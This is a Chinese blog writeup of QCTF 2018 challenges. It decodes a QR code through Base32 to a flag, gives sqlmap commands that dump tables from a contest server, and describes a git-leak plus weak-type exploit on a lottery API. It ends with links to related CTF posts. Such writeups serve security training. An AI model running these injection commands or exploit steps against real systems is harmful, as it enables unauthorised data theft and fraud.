QCTF 2018 misc和web签到题 writeup

最新推荐文章于 2025-06-22 16:15:53 发布
最新推荐文章于 2025-06-22 16:15:53 发布
阅读量3.4k 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: QCTF xman writeup misc web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xuchen16/article/details/81063314
本文解析了一次CTF竞赛中的两个挑战。首先,通过解码二维码并使用Base32解码技术,揭示了一个隐藏的flag。其次,深入探讨了Web注入攻击,利用SQLmap工具发现了数据库中的敏感信息,包括一个flag。此外,还介绍了如何利用Git代码泄露和弱类型漏洞无限刷取彩票,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、misc

X-man-A face

 

用画图编辑补全二维码如下

用微信扫码得到

KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=

 

用python的base32解码得到答案QCTF{Pretty_Sister_Who_Buys_Me_Lobster}

 

二、 web

1.NewsCenter

页面搜索post提交的地方有注入点用sqlmap跑下

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql --current-db   查询当前数据库

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news –tables    查询news数据库有几张表

 

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news -T secret_table –columns  查询secret_table表字段内容出现flag

 

2. Lottery

用awvs扫描站点发现存在git代码泄露

 

https://github.com/lijiejie/GitHack  利用脚本下载源码

在 api.php 85行number传入参数没有判断 第 89 行处找到 弱类型 漏洞。

用burp构造号码全是 True 就可以无限刷了,刷到1000万购买flag

 

 

xuchen16
关注
CTF——MISC讲解(GKCTF 2021系列)
tlovejr的博客
03-04 6204
CTF——MISC讲解(GKCTF 2021系列) 前言 接下来陆续给大家复现一些赛事的杂项习讲解,因为本人也是小白入门,有些目做的不对还请各位大佬多多包涵。 一、[GKCTF 2021]签到 链接:https://pan.baidu.com/s/1rlBOLJMn-nYCsuyCT3eOSg?pwd=lfuj 提取码:lfuj 打开目后是一个流量分析目 然后我们看一下http协议,并追踪TCP流可以发现,在众多HTTP协议中,好像是执行Linux系统命令。 在这里进行了ls查看 在这里进行了
BUUCTF-MISC-[QCTF2018]picture
zippo1234的博客
10-23 1756
BUUCTF-MISC-[QCTF2018]picture[QCTF2018]picture目分析开始1.目2.脑洞lsb3.DES解密逆向4.解密5.get flag结语 每天一,只能多不能少 [QCTF2018]picture 目分析 1.脑洞,lsb 2.des解密逆向 开始 1.目 只给出一张png图片。 2.脑洞lsb 这里就脑洞了,用到lsb.py,密码是图片里面8个字的首字母小写wwjkwywq λ python2 lsb.py extract 1.png out.txt wwjk
Ctf新生赛Misc签到
qq_61674355的博客
10-25 2380
听话就完事了 签到目是真的新手 ,除非没有学过 转码地址:Base64 在线编码解码 | Base64 加密解密 - Base64.us
BMZCTF-MISC-2018 HEBTUCTF 签到
CHAWUCIREN1的博客
04-26 406
##BMZCTF-MISC-2018 HEBTUCTF 签到 下载以后发现是一个附件,不清楚是什么类型,丢到kali里面发现压缩包,解压之后还是类型未知,kali里面显示是一张图片。 打开也没什么东西,用010editor打开,最后发现flag。 ...
攻防世界-MISC-签到
最新发布
2301_80797059的博客
06-22 362
1.base64解密2.凯撒密码3.栅栏密码。
BUUCTF misc(1)签到
tt_npc的博客
11-04 1241
简单,答案已经告诉你就是flag{buu_ctf}
攻防世界---misc---签到
2201_75556700的博客
05-19 704
3、根据目的提示,flag很有可能是ssctf开头 ,接着继续解码,找到ssctf相关的解码结果,我整理了一下,发现这三种结果ssctf是最相关的。4、但是还不是我们想要的flag,继续解码,得到下面三种一模一样的解码。2、将括号里面的内容拿去解码,但是得到的信息不像是flag。
BUUCTF [QCTF2018]babyre
weixin_53349587的博客
01-05 1774
1.拿到文件,发现是Rust逆向,特点是主函数无法进行反编译,只能通过汇编语言逆向求解,通过搜索字符串,找到关键函数: 2.理清逻辑关系,找到关键判断: 其中的cmp判断输入的长度是否为20h,也就是32位,也就是说,需要我们输入的字符为32位。 3.动态调试: 我们输入abcdefghijklmnopqrstuvwxyzABCDEF,F8单步运行,中间的函数过程不用看,一直动调看输入的字符串怎么变化的。 第一次变化: 四个一组,位置发生了变化。 第二次变化: 通过..
BUUCTF-[QCTF2018]X-man-Keyword
m0_67507776的博客
05-02 2192
1.开局一张图片 2.用binwalk、stegsolve等没有发现异常。在kali用LSB-cloacked-pixel-master工具有内容 python2 lsb.py extract attachment.png 001.txt lovekfc 3.查看txt文本,得到密文 PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf} 4.根据提示将keyword放到前面,从26个英文字母里把 “lovekfc”提出来放到前面制作密钥 lovekfca..
[QCTF2018]Xman-RSA
2er0!=O的博客
08-01 539
[QCTF2018]Xman-RSA 附件: ciphertext: 1240198b148089290e375b999569f0d53c32d356b2e95f5acee070f016b3bef243d0b5e46d9ad7aa7dfe2f21bda920d0ac7ce7b1e48f22b2de410c6f391ce7c4347c65ffc9704ecb3068005e9f35cbbb7b27e0f7a18f4f42ae572d77aaa3ee189418d6a07bab7d93beaa365c9834
buu-[QCTF2018]Xman-babymips
qaq517384的博客
04-12 581
32位elf文件,MIPS指令集 在gayhub上下载有关ida的插件 根据ida-master/plugins的readme文件安装插件
CTF MISC安全杂项经典例讲解
10-22
该内容为CTF赛MISC安全杂项经理例讲解,包含图片隐写,流量分析,web安全等多种型讲解,图文结合,适合新手学习。
CTF比赛中常见的MISC方法
EaSoNgo111的博客
05-09 3703
可以看到1.png这个图片的文件头,那我们现在需要寻找文件尾,按ctrl+f,查找文件尾AE 42 60 82,如果图片里隐藏了数据,那么文件尾后就会藏有文件:大多数时候都是pk开头的文本格式,这就是压缩包,所以把这个图片扔到binwalk或者foremost里分离一下(嫌麻烦的可以直接将这个1.png文件改后缀),如果是隐藏了zip,直接将1.png改名为1.zip。(一)鼠标右键查看属性,最简单的目是属性里备注给出了flag或者各种编码(编码解法在最上面我说过的)文件尾,50 4B.
CTF MISC思路BUUCTF MISC1-8刷
打工人
05-21 3900
CTF MISC思路BUUCTF MISC1-8解思路
Bugku Misc 签到
我,我的博客
08-07 2226
文件为微信二维码,扫描关注公众号,即得  flag{BugKu-Sec-pwn!} 20 Points Get!
【BugKu-CTF论坛writeup(杂项)】签到
preserphy的博客
03-04 1159
好吧,似乎是广告…扫描关注即得flag
2018护网杯MISC签到Easy Xor
Kr的博客
10-21 3342
记录一下做这种的方法 目直接给了一串base64加密的字符串,让我们xor AAoHAR0jJ1AlVVEkU1BUVCAlIlFTUVUiUFRTVFVeU1FXUCVUJxs= 在网上看大佬们的writeup说的是因为不知道谁异或,所以直接写脚本爆破 import base64 char = "AAoHAR0jJ1AlVVEkU1BUVCAlIlFTUVUiUFRTVFVe...
签到
wanghandou的博客
07-22 569
签到 时间限制:1000 ms  |  内存限制:65535 KB 难度:2 描述 hrw最近看到一个有趣的几何目描述是这样的:一个大圆盘里面放入许多小圆盘,每个小圆盘必须接触大圆盘边缘且与其他小圆盘不能相交,但它们可以互相接触,每个小圆盘具有相同的半径,求此条件下能否放入n个小圆盘。 输入Multiple sets of test data,The first
【BUUCTF】Misc
热门推荐
xuanyulevel6的博客
07-31 2万+
BUUCTF-Misc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值